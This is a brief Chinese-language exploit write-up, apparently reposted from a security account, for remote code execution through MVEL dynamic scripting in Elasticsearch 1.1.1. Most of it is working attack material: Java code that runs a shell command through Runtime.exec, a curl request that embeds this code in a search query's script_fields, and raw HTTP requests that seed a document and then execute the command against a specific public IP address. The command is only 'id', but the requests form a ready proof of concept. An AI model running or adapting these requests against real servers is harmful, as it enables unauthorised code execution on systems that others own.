jre版本：openjdk:8-jre

elasticsearch版本：v1.1.1

MVEL执行命令的代码如下：

1. <font color="#000000">import java.io.*;

2. new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();</font>

将Java代码放入json中：

1. <font color="#000000">curl -XPOST 'http://localhost:9200/_search?pretty' -d '{

2.     "size": 1,

3.     "query": {

4.       "filtered": {

5.         "query": {

6.           "match_all": {

7.           }

8.         }

9.       }

10.     },

11.     "script_fields": {

12.         "command": {

13.             "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"

14.         }

15.     }

16.   }

17.   '</font>

首先，该漏洞需要es中至少存在一条数据，所以我们需要先创建一条数据：

1. <font color="#000000">POST /website/blog/ HTTP/1.1

2. Host: 188.40.189.134:9200

3. Accept: */*

4. Accept-Language: en

5. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

6. Connection: close

7. Content-Type: application/x-www-form-urlencoded

8. Content-Length: 29

9.  

10. {

11.   "name": "phithon"

12. }</font>

然后，执行任意代码：

1. <font color="#000000">POST /_search?pretty HTTP/1.1

2. Host: 188.40.189.134:9200

3. Accept: */*

4. Accept-Language: en

5. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

6. Connection: close

7. Content-Type: application/x-www-form-urlencoded

8. Content-Length: 360

9.  

10. {

11.     "size": 1,

12.     "query": {

13.       "filtered": {

14.         "query": {

15.           "match_all": {

16.           }

17.         }

18.       }

19.     },

20.     "script_fields": {

21.         "command": {

22.             "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"

23.         }

24.     }

25. }</font>

转自：黑白之道